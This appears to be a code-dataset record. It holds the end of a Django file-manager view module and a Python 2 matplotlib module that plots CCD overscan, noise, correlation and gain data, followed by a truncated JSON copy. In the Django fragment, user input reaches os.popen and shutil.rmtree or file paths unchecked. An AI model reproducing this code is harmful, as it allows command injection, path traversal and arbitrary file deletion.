error_msg=\"登陆过期\"\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef del_dir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(\n state_code=-2,\n error_msg='参数错误'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(\n state_code=1,\n error_msg='目录不存在'\n )\n else:\n with transaction.atomic():\n obj_dir = models.Dirs.objects.filter(dir=dir_name).all()\n if obj_dir:\n obj_dir.delete()\n shutil.rmtree(dir_path)\n res = dict(\n state_code=0,\n eror_msg='ok'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(\n state_code=-2,\n error_msg='参数错误'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(\n state_code=1,\n error_msg='目录不存在'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n # 获取上传的文件,如果没有文件,则默认为None;\n File = request.FILES.get(\"file\", None)\n if File is None:\n res = dict(\n state_code=-2,\n error_msg='参数错误'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n # 打开特定的文件进行二进制的写操作;\n with open(file_path, 'wb+') as f:\n # 分块写入文件;\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(\n state_code=0,\n error_msg='ok',\n )\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen(\"ls -l -h {}\".format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({\n 'file_name': file_name,\n 'file_type': file_type,\n 'file_size': file_size\n })\n res = dict(\n state_code=0,\n error_msg='ok',\n data={\n 'file_list': file_list_data\n }\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder,dir_name),file)\n if not os.path.exists(file_path):\n res = dict(\n state_code=1,\n error_msg='文件不存在'\n )\n else:\n os.remove(file_path)\n res = dict(\n state_code=0,\n error_msg='ok'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef download_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name+'.'+file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder,dir_name),file)\n if not os.path.exists(file_path):\n res = dict(\n state_code=1,\n error_msg='文件不存在'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n from django.http import StreamingHttpResponse\n file_size = os.path.getsize(file_path)\n def file_iterator(file_name, chunk_size=512): # 用于形成二进制数据\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n the_file_name = file_path # 要下载的文件路径\n res = file_iterator(the_file_name)\n response = StreamingHttpResponse(res) # 这里创建返回\n response['Content-Type'] = 'application/octet-stream; charset=UTF-8' # 注意格式\n response['Content-Length'] = file_size\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(escape_uri_path(file)) # 注意filename 这个是下载后的名字\n return response\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
import matplotlib
matplotlib.use('Agg')
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.axes_grid1 import make_axes_locatable
def plot_overscan(overscan, img, TITLE, OUT_DIR):
""" plot overscan in 9x2 plots with 16 channels """
fig = plt.figure(figsize=(20, 20))
gs0 = gridspec.GridSpec(3, 3)
for i, f in enumerate(img):
x = f.dev_index % 3
gs = gridspec.GridSpecFromSubplotSpec(
1, 2, wspace=0, subplot_spec=gs0[f.dev_index])
ax2 = plt.subplot(gs[0, 0])
for j in range(9, 17):
plt.plot(overscan[i, j - 1] + 500 *
(j - 8), label='seg' + str(j + 1))
plt.legend(fontsize=6, loc='upper center', ncol=4)
if x != 0:
ax2.set_yticklabels([])
plt.grid()
plt.xlim(0, 2100)
plt.ylim(0, 4500)
ax2.set_title(f.dev_name + ' (seg 10-17)')
ax1 = plt.subplot(gs[0, 1])
for j in range(1, 9):
plt.plot(overscan[i, j - 1] + 500 * j, label='seg' + str(j - 1))
plt.legend(fontsize=6, loc='upper center', ncol=4)
if x != 2:
ax1.set_yticklabels([])
if x == 2:
ax1.yaxis.tick_right()
plt.grid()
plt.xlim(0, 2100)
plt.ylim(0, 4500)
ax1.set_title(f.dev_name + ' (seg 0-7)')
fig.suptitle('Overscan ' + TITLE, y=0.94, size=20)
plt.subplots_adjust(wspace=0.05)
plt.savefig(OUT_DIR + TITLE + '_spatial.png')
plt.close(fig)
def plot_overscan_diff(overscan, img, TITLE, OUT_DIR):
""" plot overscan with subtracted 7th / 17th channel """
fig = plt.figure(figsize=(20, 20))
gs0 = gridspec.GridSpec(3, 3)
for i, f in enumerate(img):
x = f.dev_index % 3
gs = gridspec.GridSpecFromSubplotSpec(
1, 2, wspace=0, subplot_spec=gs0[f.dev_index])
ax2 = plt.subplot(gs[0, 0])
for j in range(9, 17):
plt.plot(overscan[i, j - 1] - overscan[i, 15] +
500 * (j - 8), label='seg' + str(j + 1))
plt.legend(fontsize=6, loc='upper center', ncol=4)
if(x != 0):
ax2.set_yticklabels([])
plt.grid()
plt.xlim(0, 2100)
plt.ylim(0, 4500)
ax2.set_title(f.dev_name + ' (seg 10-17)')
ax1 = plt.subplot(gs[0, 1])
for j in range(1, 9):
plt.plot(overscan[i, j - 1] - overscan[i, 7] +
500 * j, label='seg' + str(j - 1))
plt.legend(fontsize=6, loc='upper center', ncol=4)
if(x != 2):
ax1.set_yticklabels([])
if(x == 2):
ax1.yaxis.tick_right()
plt.grid()
plt.xlim(0, 2100)
plt.ylim(0, 4500)
ax1.set_title(f.dev_name + ' (seg 0-7)')
# ax1.set_title('S-'+f[7:9]+' (seg 0-7)')
fig.suptitle('Overscan (diff) ' + TITLE, y=0.94, size=20)
plt.subplots_adjust(wspace=0.05)
plt.savefig(OUT_DIR + TITLE + '_diff_spatial.png')
plt.close(fig)
def plot_mean_std_stddelta(m, n, nd, img, TITLE, OUT_DIR):
""" plot std vs. mean vs. std_delta (comparison) """
fig = plt.figure(figsize=(15, 10))
for i, f in enumerate(img):
ax1 = plt.subplot(3, 3, f.dev_index + 1)
lns1 = ax1.plot(m[i], 'o', color='green', label='offset')
ax1.set_ylabel('mean')
ax1.set_xlabel('segment num')
ax2 = ax1.twinx()
lns2 = ax2.plot(n[i], '^', color='blue', label='noise')
ax2.set_ylabel('stdev')
lns3 = ax2.plot(nd[i], 'v', color='red', label='dnoise')
lns = lns1 + lns2 + lns3
labs = [l.get_label() for l in lns]
ax1.legend(lns, labs, bbox_to_anchor=(0., 1.07, 1., .102),
fontsize='small', ncol=3, numpoints=1, loc=9)
plt.grid()
plt.title(' ' + f.dev_name, y=1.15)
fig.suptitle('Offset, noise, dnoise comparison ' + TITLE, y=0.99, size=20)
plt.subplots_adjust(wspace=0.5, hspace=0.6)
plt.savefig(OUT_DIR + TITLE + '_std_vs_mean.png')
plt.close(fig)
def plot_histogram_mean(m, TITLE, OUT_DIR):
fig = plt.figure(figsize=(15, 15))
m_all = m.ravel()
for bin_num in np.arange(10, 100, 10):
plt.subplot(3, 3, bin_num / 10)
plt.hist(m_all, bin_num, facecolor='green')
plt.title('Bins = ' + str(bin_num))
plt.subplots_adjust(wspace=0.2, hspace=0.2)
fig.suptitle('offset histogram ' + TITLE, y=0.92, size=20)
plt.savefig(OUT_DIR + TITLE + '_mean_histo.png')
plt.close(fig)
def plot_histogram_std(n, TITLE, OUT_DIR):
fig = plt.figure(figsize=(15, 15))
n_all = n.ravel()
for bin_num in np.arange(10, 100, 10):
plt.subplot(3, 3, bin_num / 10)
plt.hist(n_all, bin_num, facecolor='green')
plt.title('Bins = ' + str(bin_num))
fig.suptitle('noise histogram ' + TITLE, y=0.92, size=20)
plt.subplots_adjust(wspace=0.2, hspace=0.2)
plt.savefig(OUT_DIR + TITLE + '_std_histo.png')
plt.close(fig)
def plot_histogram_std_dev(nd, TITLE, OUT_DIR):
fig = plt.figure(figsize=(15, 15))
nd_all = nd.ravel()
for bin_num in np.arange(10, 100, 10):
plt.subplot(3, 3, bin_num / 10)
plt.hist(nd_all, bin_num, facecolor='green')
plt.title('Bins = ' + str(bin_num))
fig.suptitle('dnoise histogram ' + TITLE, y=0.92, size=20)
plt.subplots_adjust(wspace=0.2, hspace=0.2)
plt.savefig(OUT_DIR + TITLE + '_stddelta_histo.png')
plt.close(fig)
def plot_histogram_all(m, n, nd, TITLE, OUT_DIR):
plot_histogram_mean(m, TITLE, OUT_DIR)
plot_histogram_std(n, TITLE, OUT_DIR)
plot_histogram_std_dev(nd, TITLE, OUT_DIR)
def plot_histogram_all_one_binning(m, n, nd, TITLE, OUT_DIR, bin_num=45,
num_ccd=9, omit_REBs=[], read_REBs=set([0, 1, 2])):
from matplotlib.patches import Rectangle
if num_ccd != len(read_REBs) * 3:
print "ERROR! num_ccd = %i while number of REBs being read is %i." % (
num_ccd, len(read_REBs)
)
return "\n"
fig = plt.figure(figsize=(15, 6))
m_all = m.ravel()
m_all = m_all[0:16 * num_ccd]
n_all = n.ravel()
n_all = n_all[0:16 * num_ccd]
nd_all = nd.ravel()
nd_all = nd_all[0:16 * num_ccd]
# detect dead channels, DEF: noise <= 5
dead = []
for i in range(16 * num_ccd):
if n_all[i] <= 5:
dead.append(i)
# not count not-clocking REBs for statistics
# data stored in order 22, 21, 20 (REB 2), 12, 11, 10 (REB 1),...
omit_REBs = set(omit_REBs)
for REB in omit_REBs:
if REB not in [0, 1, 2]:
print "WARNING! Wrong configuration of REBs to omit %s - unrecognized REBs.\nContinuing with all REBs." % str(omit_REBs)
break
else:
if omit_REBs:
print "Omiting REBs %s" % omit_REBs
i = -1
for REB in read_REBs:
i += 1
if REB not in omit_REBs:
continue
pos = len(read_REBs) - i - 1
omit = np.arange(pos * 48, pos * 48 + 48)
dead = np.append(dead, omit)
m_no_dead = np.delete(m_all, dead)
n_no_dead = np.delete(n_all, dead)
# get rid of subtracted channels for dnoise
sub = np.arange(7, 16 * num_ccd, 8)
dead = np.append(dead, sub)
nd_no_dead = np.delete(nd_all, dead)
nd_all = np.delete(nd_all, sub)
# summary statstics computed only with live channels
if len(n_no_dead):
n_mean, n_median, n_std = np.mean(
n_no_dead), np.median(n_no_dead), np.std(n_no_dead)
else:
n_mean, n_median, n_std = 0, 0, 0
if len(m_no_dead):
m_mean, m_median, m_std = np.mean(
m_no_dead), np.median(m_no_dead), np.std(m_no_dead)
else:
m_mean, m_median, m_std = 0, 0, 0
if len(nd_no_dead):
nd_mean, nd_median, nd_std = np.mean(
nd_no_dead), np.median(nd_no_dead), np.std(nd_no_dead)
else:
nd_mean, nd_median, nd_std = 0, 0, 0
bin_num_lin = 4 * bin_num / 5
bin_num_log = 1 * bin_num / 5
bins_lin = np.linspace(0, 30, bin_num_lin)
val_max = max(max(n_all), max(nd_all))
if val_max <= 30:
val_max = 50
bins_log = np.logspace(np.log10(30), np.log10(val_max), bin_num_log)
ax1 = fig.add_subplot(1, 2, 1)
plt.hist(m_all, bin_num, facecolor='green')
plt.title('Offset')
textstr1 = '$\mu=%.0f$\n$\mathrm{median}=%.0f$\n$\sigma=%.0f$' % (
m_mean, m_median, m_std)
props1 = dict(boxstyle='round', facecolor='green', alpha=0.4)
ax1.text(0.76, 0.97, textstr1, transform=ax1.transAxes, fontsize=10,
verticalalignment='top', bbox=props1)
ax2 = fig.add_subplot(1, 2, 2)
plt.hist(n_all, bins_lin, facecolor='blue', alpha=0.5, label='noise')
plt.hist(nd_all, bins_lin, facecolor='red', alpha=0.5, label='dnoise')
plt.title('Noises')
plt.legend(loc='upper left')
ax2.axvspan(0, 5, hatch='x', fill=False)
ax2.set_xscale('linear')
ax2.set_xlim((0, 30))
ax2.set_xlim(left=0)
ax2.spines['right'].set_visible(False)
ax2.yaxis.set_ticks_position('left')
plt.setp(ax2.get_xticklabels(), visible=True)
divider = make_axes_locatable(ax2)
axLin = divider.append_axes("right", size=1.4, pad=0, sharey=ax2)
axLin.set_xscale('log')
axLin.hist(n_all, bins_log, facecolor='blue', alpha=0.5, label='noise')
axLin.hist(nd_all, bins_log, facecolor='red', alpha=0.5, label='dnoise')
axLin.autoscale()
axLin.set_xlim(left=30)
axLin.spines['left'].set_visible(False)
axLin.yaxis.set_visible(False)
axLin.yaxis.set_ticks_position('left')
textstr2 = '$\mu=%.1f$\n$\mathrm{median}=%.1f$\n$\sigma=%.1f$' % (
n_mean, n_median, n_std)
props2 = dict(boxstyle='round', facecolor='blue', alpha=0.4)
plt.text(1.98, 0.97, textstr2, transform=ax1.transAxes, fontsize=10,
verticalalignment='top', bbox=props2)
textstr3 = '$\mu=%.1f$\n$\mathrm{median}=%.1f$\n$\sigma=%.1f$' % (
nd_mean, nd_median, nd_std)
props3 = dict(boxstyle='round', facecolor='red', alpha=0.4)
plt.text(1.98, 0.80, textstr3, transform=ax1.transAxes, fontsize=10,
verticalalignment='top', bbox=props3)
fig.suptitle(TITLE, y=0.98, size=20)
# plt.subplots_adjust(wspace=0.2, hspace=0.2)
plt.savefig(OUT_DIR + TITLE + '_histo.png')
plt.close(fig)
string_info = "\t%f\t%f\t%f\t%f\t%f\t%f\t%f\t%f\t%f\n" % (
m_mean, m_median, m_std, n_mean, n_median, n_std, nd_mean, nd_median, nd_std)
return string_info
def plot_summary(data, run, OUT_DIR, SUPTITLE="Runs comparison"):
cols = len(data)
fig = plt.figure(figsize=(25, 9))
x = range(cols)
ax1 = plt.subplot(3, 1, 1)
ax1.plot(x, data[:, 0], 'o', color='darkgreen', label='mean')
ax1.errorbar(x, data[:, 0], marker='o',
color='darkgreen', yerr=data[x, 2], linestyle='None')
ax1.plot(x, data[:, 1], 'o', color='greenyellow', label='median')
ax1.set_ylabel('Offset', color='green')
ax1.legend(numpoints=1)
ax2 = plt.subplot(3, 1, 2)
ax2.plot(x, data[:, 3], 'o', color='darkblue', label='mean')
ax2.errorbar(x, data[:, 3], marker='o', color='darkblue',
yerr=data[x, 5], linestyle='None')
ax2.plot(x, data[:, 4], 'o', color='lightskyblue', label='median')
ax2.set_ylabel('Noise', color='blue')
ax2.set_ylim([0, 20])
# ax2.set_ylim(bottom=0)
ax2.legend(numpoints=1)
ax3 = plt.subplot(3, 1, 3)
ax3.plot(x, data[:, 6], 'o', color='darkred', label='mean')
ax3.errorbar(x, data[:, 6], marker='o', color='darkred',
yerr=data[x, 8], linestyle='None')
ax3.plot(x, data[:, 7], 'o', color='salmon', label='median')
ax3.set_ylabel('DNoise', color='red')
ax3.set_ylim([0, 20])
# ax3.set_ylim(bottom=0)
ax3.legend(numpoints=1)
plt.xticks(x, run, rotation=45, ha='right', fontsize=7)
fig.suptitle(SUPTITLE, y=0.96, size=20)
plt.subplots_adjust(hspace=0.0, bottom=0.20, left=0.05)
plt.savefig(OUT_DIR + 'Runs_summary.png')
plt.close(fig)
def plot_one_run_summary(f, OUT_DIR, SUPTITLE="Run summary"):
data = np.loadtxt(f, usecols=range(1, 10))
run = np.loadtxt(f, usecols=[0], dtype=str)
if data.size == 9:
print "WARNING! Only one row in '%s'. Summary is not plotting.\n" % f
return
plot_summary(data, run, OUT_DIR, SUPTITLE)
def plot_cor_ccd(a, img, TITLE, OUT_DIR, vmin=0, vmax=0.2):
fig = plt.figure(figsize=(15, 15))
seg = [0, 7, 8, 15]
lab = ["0", "7", "10", "17"]
for i, f in enumerate(img):
ax1 = plt.subplot(3, 3, f.dev_index + 1)
i_min = 16 * i
i_max = i_min + 16
aa = a[i_min:i_max, i_min:i_max]
im = plt.imshow(aa, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)
ax1.set_title(f.dev_name)
ax1.set_xlim(15.5, -0.5)
ax1.set_ylim(-0.5, 15.5)
ax1.set_xticks(seg)
ax1.set_xticklabels(lab)
ax1.set_yticks(seg)
ax1.set_yticklabels(lab)
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.85, 0.137, 0.05, 0.73])
fig.colorbar(im, cax=cbar_ax)
fig.suptitle("Inter CCD correlations " + TITLE, y=0.93, size=20)
plt.savefig(OUT_DIR + TITLE + '_cor_ccd.png')
plt.close(fig)
def plot_cor_all(a, img, TITLE, OUT_DIR, vmin=0, vmax=0.2):
fig = plt.figure(figsize=(15, 15))
im = plt.imshow(a, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)
seg = np.arange(0, len(a), 16)
r = img.ccd_num / 9.0
plt.xticks(seg)
plt.yticks(seg)
for i, f in enumerate(img):
plt.text(-10 * r, 8 + 16 * i, f.dev_name,
size=15, verticalalignment='center')
widthB = 54 / img.ccd_num
widthB = str(widthB)
for i in np.arange(0, img.ccd_num, 3):
REB = 'REB' + img[i].dev_name[1:2]
plt.annotate(REB, xy=(-11 * r, 24 + i * 16), xytext=(-18 * r, 24 + i * 16), xycoords='data',
fontsize=20, annotation_clip=False, ha='center', va='center',
arrowprops=dict(arrowstyle='-[, widthB=%s, lengthB=1.5' % widthB, lw=2.0))
fig.subplots_adjust(right=0.82)
cbar_ax = fig.add_axes([0.85, 0.155, 0.05, 0.695])
fig.colorbar(im, cax=cbar_ax)
fig.suptitle("Overall correlations " + TITLE, y=0.91, size=20)
plt.savefig(OUT_DIR + TITLE + '_cor_all.png')
plt.close(fig)
def plot_cor_ccd_mean(a, img, TITLE, OUT_DIR, vmin=-1, vmax=1):
fig = plt.figure(figsize=(15, 15))
im = plt.imshow(a, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)
loc = range(img.ccd_num)
labels = []
for fli in img:
labels.append(fli.dev_name)
plt.xticks(loc, labels)
plt.yticks(loc, labels)
fig.subplots_adjust(right=0.82)
cbar_ax = fig.add_axes([0.85, 0.155, 0.05, 0.695])
fig.colorbar(im, cax=cbar_ax)
fig.suptitle("Correlations of means of CCDs " + TITLE, y=0.91, size=20)
plt.savefig(OUT_DIR + TITLE + '_cor_ccd_mean.png')
plt.close(fig)
def plot_gains(gains, gain_ref, TITLES, OUT_DIR):
""" plot gains with respect to the reference gain,
whre reference gain is number => gains[gain_ref]"""
# print 'directory: %s' % OUT_DIR
# print 'TITLES:%s', TITLES
gain_ref_np = np.array(gains[gain_ref].gain)
ratios = []
for gain in gains:
gain_np = np.array(gain.gain)
dim = (min(gain_ref_np.shape[0], gain_np.shape[0]),
min(gain_ref_np.shape[1], gain_np.shape[1])
)
# print 'dim = ', dim
ratios.append(gain_np[0:dim[0], 0:dim[1]] / gain_ref_np[0:dim[0], 0:dim[1]])
# print 'Ratios = ', ratios
rows = 2*((len(ratios) -1) / 6 + 1)
cmap = plt.get_cmap('gnuplot')
colors = [cmap(i) for i in np.linspace(0, 1, len(ratios))]
fig, axes = plt.subplots(nrows=rows, ncols=6)
fig.set_size_inches(20,20)
axfl = axes.flatten()
for i, ratio in enumerate(ratios):
# print 'Plotting %s', TITLES[i]
j = (i / 6)*12 + i % 6
ax = axfl[j]
ax2 = axfl[j+6]
ax.hist(np.reshape(ratio, -1), 20, range=(0.9, 1.1), facecolor=colors[i])
ax.set_title(TITLES[i], size=20)
ax2.hist(np.reshape(ratio, -1), 50, range=(0., 2.), facecolor=colors[i])
fig.suptitle("Gains with ref gain '%s'" % TITLES[gain_ref], y=0.95, size=25)
# fig.tight_layout()
plt.savefig(OUT_DIR + 'gain.png')
plt.close(fig)
def plot_raft_map(data, img, TITLE, OUTDIR, vmin=None, vmax=None):
""" create a raft map 6x24 for data in CCDsx16 array """
map = np.zeros((6, 24))
for i, fli in enumerate(img):
x = (fli.dev_index / 3) * 2 # [0, 2, 4]
y = (fli.dev_index % 3) * 8 # [0, 8, 16]
for j in range(16):
xx = x + j / 8 # [0, 1,..., 5]
yy = y + j % 8 # [0, 1,..., 23]
map[xx, yy] = data[i, j]
yseg = range(6)
ylab = ["00-07", "10-17", "00-07", "10-17", "00-07", "10-17"]
xseg = range(0, 24, 4)
xlab = ["0", "4", "0", "4", "0", "4"]
fig = plt.figure(figsize=(10, 10))
ax1 = fig.add_subplot(111)
im = ax1.imshow(map, interpolation='nearest', cmap='jet', aspect=4, vmin=vmin, vmax=vmax)
plt.yticks(yseg, ylab)
plt.xticks(xseg, xlab)
plt.annotate('S22', xy=(0, 0), xytext=(4, -0.8), fontsize=15, ha='center', va='center')
plt.annotate('S12', xy=(0, 0), xytext=(12, -0.8), fontsize=15, ha='center', va='center')
plt.annotate('S02', xy=(0, 0), xytext=(20, -0.8), fontsize=15, ha='center', va='center')
plt.annotate('S02', xy=(0, 0), xytext=(24., 0.5), fontsize=15, ha='left', va='center')
plt.annotate('S01', xy=(0, 0), xytext=(24., 2.5), fontsize=15, ha='left', va='center')
plt.annotate('S00', xy=(0, 0), xytext=(24., 4.5), fontsize=15, ha='left', va='center')
ax1.vlines(7.5, -0.5, 5.5)
ax1.vlines(15.5, -0.5, 5.5)
ax1.hlines(1.5, -0.5, 23.5)
ax1.hlines(3.5, -0.5, 23.5)
plt.subplots_adjust(left=0.07, bottom=0.05, right=0.8, top=0.95, wspace=0, hspace=0)
#cbar_ax = fig.add_axes([0.15, 0.03, 0.7, 0.05])
#fig.colorbar(im, cax=cbar_ax, orientation="horizontal")
cbar_ax = fig.add_axes([0.87, 0.15, 0.05, 0.7])
fig.colorbar(im, cax=cbar_ax)
fig.suptitle(TITLE, y=0.98, size=19)
plt.savefig(OUTDIR + TITLE + '.png')
plt.show()
plt.close(fig)
def plot_voltage_all(x, data, imgs, title, out_dir, suptitle=''):
if suptitle == '':
suptitle = title
fig = plt.figure(figsize=(20, 24))
cmap = plt.get_cmap('gist_ncar')
colors = [cmap(i) for i in np.linspace(0, 1, 16)]
for k in range(9):
ax1 = plt.subplot(3, 3, imgs[0][k].dev_index + 1)
ax1.set_title(imgs[0][k].dev_name)
for j in range(16):
y = []
for i in range(len(x)):
y.append(data[i][k][j])
plt.plot(x, y, label='Segment %i' % j, color=colors[j])
fig.suptitle(suptitle + '; all segments', y=0.99, size=20)
plt.legend(loc='lower left', bbox_to_anchor=(0.87, 1.1), ncol=4)
plt.subplots_adjust(bottom=0.04, left=0.04, top=0.88, right=0.96, wspace=0.1, hspace=0.1)
plt.savefig(out_dir + title + '_all.png')
plt.close(fig)
def plot_voltage_ccd(x, data, imgs, title, out_dir, suptitle=''):
if suptitle == '':
suptitle = title
fig = plt.figure(figsize=(15, 15))
for k in range(9):
ax1 = plt.subplot(3, 3, imgs[0][k].dev_index + 1)
ax1.set_title(imgs[0][k].dev_name)
y = []
for i in range(len(x)):
y.append(np.mean(data[i][k]))
plt.plot(x, y)
fig.suptitle(suptitle + '; mean of segments, per CCD', y=0.94, size=20)
plt.savefig(out_dir + title + '_CCD.png')
plt.close(fig)
def plot_voltage_raft(x, data, imgs, title, out_dir, suptitle=''):
if suptitle == '':
suptitle = title
fig = plt.figure(figsize=(7, 7))
y = []
for i in range(len(x)):
y.append(np.mean(data[i]))
plt.plot(x, y)
fig.suptitle(suptitle + '; mean of all segments', y=0.96, size=20)
plt.savefig(out_dir + title + '_raft.png')
plt.close(fig)
|
normal
|
{
"blob_id": "736861f18936c7a87ecf3deb134f589b9d7eed92",
"index": 3934,
"step-1": "\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\ndef plot_overscan(overscan, img, TITLE, OUT_DIR):\n \"\"\" plot overscan in 9x2 plots with 16 channels \"\"\"\n fig = plt.figure(figsize=(20, 20))\n gs0 = gridspec.GridSpec(3, 3)\n\n for i, f in enumerate(img):\n x = f.dev_index % 3\n\n gs = gridspec.GridSpecFromSubplotSpec(\n 1, 2, wspace=0, subplot_spec=gs0[f.dev_index])\n ax2 = plt.subplot(gs[0, 0])\n for j in range(9, 17):\n plt.plot(overscan[i, j - 1] + 500 *\n (j - 8), label='seg' + str(j + 1))\n plt.legend(fontsize=6, loc='upper center', ncol=4)\n if x != 0:\n ax2.set_yticklabels([])\n\n plt.grid()\n plt.xlim(0, 2100)\n plt.ylim(0, 4500)\n ax2.set_title(f.dev_name + ' (seg 10-17)')\n\n ax1 = plt.subplot(gs[0, 1])\n for j in range(1, 9):\n plt.plot(overscan[i, j - 1] + 500 * j, label='seg' + str(j - 1))\n plt.legend(fontsize=6, loc='upper center', ncol=4)\n if x != 2:\n ax1.set_yticklabels([])\n if x == 2:\n ax1.yaxis.tick_right()\n plt.grid()\n plt.xlim(0, 2100)\n plt.ylim(0, 4500)\n ax1.set_title(f.dev_name + ' (seg 0-7)')\n\n fig.suptitle('Overscan ' + TITLE, y=0.94, size=20)\n plt.subplots_adjust(wspace=0.05)\n plt.savefig(OUT_DIR + TITLE + '_spatial.png')\n plt.close(fig)\n\n\ndef plot_overscan_diff(overscan, img, TITLE, OUT_DIR):\n \"\"\" plot overscan with subtracted 7th / 17th channel \"\"\"\n fig = plt.figure(figsize=(20, 20))\n gs0 = gridspec.GridSpec(3, 3)\n\n for i, f in enumerate(img):\n x = f.dev_index % 3\n\n gs = gridspec.GridSpecFromSubplotSpec(\n 1, 2, wspace=0, subplot_spec=gs0[f.dev_index])\n ax2 = plt.subplot(gs[0, 0])\n for j in range(9, 17):\n plt.plot(overscan[i, j - 1] - overscan[i, 15] +\n 500 * (j - 8), label='seg' + str(j + 1))\n plt.legend(fontsize=6, loc='upper center', ncol=4)\n if(x != 0):\n ax2.set_yticklabels([])\n\n plt.grid()\n plt.xlim(0, 2100)\n plt.ylim(0, 4500)\n ax2.set_title(f.dev_name + ' (seg 10-17)')\n\n ax1 = plt.subplot(gs[0, 1])\n for j in range(1, 9):\n plt.plot(overscan[i, j - 1] - overscan[i, 7] +\n 500 * j, label='seg' + str(j - 1))\n plt.legend(fontsize=6, loc='upper center', ncol=4)\n if(x != 2):\n ax1.set_yticklabels([])\n if(x == 2):\n ax1.yaxis.tick_right()\n plt.grid()\n plt.xlim(0, 2100)\n plt.ylim(0, 4500)\n ax1.set_title(f.dev_name + ' (seg 0-7)')\n #\tax1.set_title('S-'+f[7:9]+' (seg 0-7)')\n\n fig.suptitle('Overscan (diff) ' + TITLE, y=0.94, size=20)\n plt.subplots_adjust(wspace=0.05)\n plt.savefig(OUT_DIR + TITLE + '_diff_spatial.png')\n plt.close(fig)\n\n\ndef plot_mean_std_stddelta(m, n, nd, img, TITLE, OUT_DIR):\n \"\"\" plot std vs. mean vs. std_delta (comparison) \"\"\"\n fig = plt.figure(figsize=(15, 10))\n\n for i, f in enumerate(img):\n\n ax1 = plt.subplot(3, 3, f.dev_index + 1)\n lns1 = ax1.plot(m[i], 'o', color='green', label='offset')\n ax1.set_ylabel('mean')\n ax1.set_xlabel('segment num')\n\n ax2 = ax1.twinx()\n lns2 = ax2.plot(n[i], '^', color='blue', label='noise')\n ax2.set_ylabel('stdev')\n lns3 = ax2.plot(nd[i], 'v', color='red', label='dnoise')\n\n lns = lns1 + lns2 + lns3\n labs = [l.get_label() for l in lns]\n ax1.legend(lns, labs, bbox_to_anchor=(0., 1.07, 1., .102),\n fontsize='small', ncol=3, numpoints=1, loc=9)\n\n plt.grid()\n plt.title(' ' + f.dev_name, y=1.15)\n\n fig.suptitle('Offset, noise, dnoise comparison ' + TITLE, y=0.99, size=20)\n plt.subplots_adjust(wspace=0.5, hspace=0.6)\n plt.savefig(OUT_DIR + TITLE + '_std_vs_mean.png')\n plt.close(fig)\n\n\ndef plot_histogram_mean(m, TITLE, OUT_DIR):\n fig = plt.figure(figsize=(15, 15))\n m_all = m.ravel()\n\n for bin_num in np.arange(10, 100, 10):\n plt.subplot(3, 3, bin_num / 10)\n plt.hist(m_all, bin_num, facecolor='green')\n plt.title('Bins = ' + str(bin_num))\n\n plt.subplots_adjust(wspace=0.2, hspace=0.2)\n fig.suptitle('offset histogram ' + TITLE, y=0.92, size=20)\n plt.savefig(OUT_DIR + TITLE + '_mean_histo.png')\n plt.close(fig)\n\n\ndef plot_histogram_std(n, TITLE, OUT_DIR):\n fig = plt.figure(figsize=(15, 15))\n n_all = n.ravel()\n\n for bin_num in np.arange(10, 100, 10):\n plt.subplot(3, 3, bin_num / 10)\n plt.hist(n_all, bin_num, facecolor='green')\n plt.title('Bins = ' + str(bin_num))\n\n fig.suptitle('noise histogram ' + TITLE, y=0.92, size=20)\n plt.subplots_adjust(wspace=0.2, hspace=0.2)\n plt.savefig(OUT_DIR + TITLE + '_std_histo.png')\n plt.close(fig)\n\n\ndef plot_histogram_std_dev(nd, TITLE, OUT_DIR):\n fig = plt.figure(figsize=(15, 15))\n nd_all = nd.ravel()\n\n for bin_num in np.arange(10, 